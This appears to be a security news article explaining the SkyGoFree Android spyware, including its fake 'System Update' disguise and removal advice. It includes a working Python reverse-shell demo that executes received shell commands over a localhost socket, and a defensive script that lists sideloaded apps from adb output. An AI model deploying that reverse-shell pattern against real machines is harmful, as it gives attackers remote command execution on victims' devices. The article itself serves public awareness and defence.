SkyGoFree spies on your Android phone and your messages
This spyware has been called the Android threat of the year so far in 2018: it spies on your Android phone and on your messages. The decompiled Java code of the malware reveals the range of data it knows how to steal. One identifier in the decompiled code is “RUBICA”, a variant spelling of rubrica, the Italian word for address book, which suggests that much of the code was written by an Italian speaker.
There’s loads more treacherous functionality in the malware, including a function called StartReverse() that connects your phone up to a server run by the crooks to give them what’s called a reverse shell.
Normally, to log on to a command prompt (known in Unix and Linux as a shell) on a device you have to initiate a connection to that device, which means getting through any firewalls and network address translation that are in the way. A reverse shell turns this around: the infected phone makes an outbound connection to the crooks’ server, and most networks allow outbound connections, so the crooks end up with a command prompt on your phone without ever having to reach it from the outside.
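To make the direction of the connection concrete, here is an added demonstration of the reverse-shell pattern described above. It is not the malware’s code and not Android code: both halves run on the same machine over 127.0.0.1 so it works offline, the framing marker and function names are our own, and the “victim” half simply runs whatever command line the “operator” half sends down the connection that the victim opened.

```python
import socket
import subprocess
import threading

# Added demo, not the malware's code. Both ends run on this machine (127.0.0.1)
# so the example works offline; a real implant would dial out to a server on
# the internet instead.
LISTEN_HOST = "127.0.0.1"
END_MARKER = b"\n<END>\n"  # constructed framing so the operator knows output is complete


def _recv_until(sock, marker):
    """Read from sock until marker arrives (or the peer closes)."""
    buf = b""
    while not buf.endswith(marker):
        chunk = sock.recv(4096)
        if not chunk:
            return buf
        buf += chunk
    return buf[: -len(marker)]


def operator_side(server_sock, commands, results):
    """The crooks' listener: it never connects anywhere. It waits for the
    phone to call in, then pushes commands down the connection the phone opened."""
    conn, _peer = server_sock.accept()
    with conn:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            results.append(_recv_until(conn, END_MARKER).decode())
        conn.sendall(b"exit\n")


def start_reverse(host, port):
    """The victim side, i.e. what a StartReverse()-style routine does: open an
    OUTBOUND TCP connection (which firewalls and NAT normally permit) and run
    whatever comes back, returning the output over the same connection."""
    with socket.create_connection((host, port)) as sock:
        reader = sock.makefile("rb")
        for line in reader:
            cmd = line.decode().strip()
            if cmd == "exit":
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
            sock.sendall((proc.stdout + proc.stderr).encode() + END_MARKER)


def run_demo(commands):
    """Wire the two halves together locally and return each command's output."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((LISTEN_HOST, 0))  # port 0: let the OS pick a free port
    server.listen(1)
    port = server.getsockname()[1]
    results = []
    worker = threading.Thread(target=operator_side, args=(server, commands, results))
    worker.start()
    start_reverse(LISTEN_HOST, port)  # the "phone" dials out to the listener
    worker.join()
    server.close()
    return results


if __name__ == "__main__":
    cmds = ["echo hello", "uname"]
    for cmd, out in zip(cmds, run_demo(cmds)):
        print(f"$ {cmd}\n{out}", end="")
```

The only packet the phone ever sends first is the outbound connection in start_reverse(); from then on the crooks talk and the phone obeys. That is why a home router or corporate NAT that blocks all inbound connections offers no protection against this kind of implant, and why outbound traffic to unexpected servers is what network monitoring should be looking for.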
The sample that was examined pretends to be a “System Update”, using a green Android icon:
If you launch the app, it starts running in the background but almost immediately removes its own icon to give you the impression that the “update” has finished.
Fortunately, the app still shows up on the System/Apps page, where you can stop it and uninstall it:
Just note that this application was never in the Google Play Store, so you’d have to go to the Settings/Security page and turn on the non-default option to “Allow installation of apps from unknown sources” to get infected (on Android 8 and later, the equivalent is the per-app “Install unknown apps” permission, which you’d have to grant to whichever browser or file manager you used to open the APK):
Google Play is not the virus-free walled garden that you might have been led to believe, but it is still far safer than accepting apps from unknown sources such as alternative markets, unregulated Android forums or links sent to you by colleagues, friends or family.
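If you want to check a phone for apps that arrived by the unknown-sources route, Android records which package installed each app, and `adb shell pm list packages -i` prints that list. Here is an added triage script, not from the original article, that parses output in that format and reports every package that neither came from Google Play nor shipped with the firmware. The sample output and package names below are constructed for the example.

```python
import re

# Constructed sample output, in the format `adb shell pm list packages -i` prints
# (one line per package, with the package name of whatever installed it).
# These package names are made up for the example.
SAMPLE_INSTALLERS = """\
package:com.android.chrome  installer=com.android.vending
package:com.whatsapp  installer=com.android.vending
package:com.android.settings  installer=null
package:com.system.update  installer=com.google.android.packageinstaller
package:org.example.forumapp  installer=null
"""

# Constructed sample in the format of `adb shell pm list packages -s`
# (packages that ship with the firmware, which never have an installer recorded).
SAMPLE_SYSTEM = """\
package:com.android.settings
package:com.android.systemui
"""

PLAY_STORE = "com.android.vending"  # the Google Play Store's own package name
PACKAGE_RE = re.compile(r"^package:(\S+)(?:\s+installer=(\S+))?$")


def parse_packages(text):
    """Map package name -> installer package ('null' when none was recorded)."""
    found = {}
    for line in text.splitlines():
        m = PACKAGE_RE.match(line.strip())
        if m:
            found[m.group(1)] = m.group(2) or "null"
    return found


def sideloaded(installer_text, system_text):
    """Packages that neither came from Google Play nor ship with the firmware.
    Everything on this list got onto the phone some other way: a tapped APK
    (installer=com.google.android.packageinstaller or com.android.packageinstaller),
    an alternative market, or an ADB/MDM install (installer=null)."""
    installers = parse_packages(installer_text)
    system = set(parse_packages(system_text))
    return sorted(
        pkg for pkg, inst in installers.items()
        if inst != PLAY_STORE and pkg not in system
    )


if __name__ == "__main__":
    for pkg in sideloaded(SAMPLE_INSTALLERS, SAMPLE_SYSTEM):
        print("not from Google Play:", pkg)
```

On a real phone you would pipe the two adb commands into the two functions. One caveat: the installer name is recorded by whatever app did the installing, so on a rooted or already-compromised device it can be faked; treat an empty list as reassuring rather than as proof, and treat anything on the list that calls itself a “system update” as a reason to look at the Settings/Apps page.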
What to look for
- Stick to Google Play
- Use an Android anti-virus
- Don’t trust system updates offered by third parties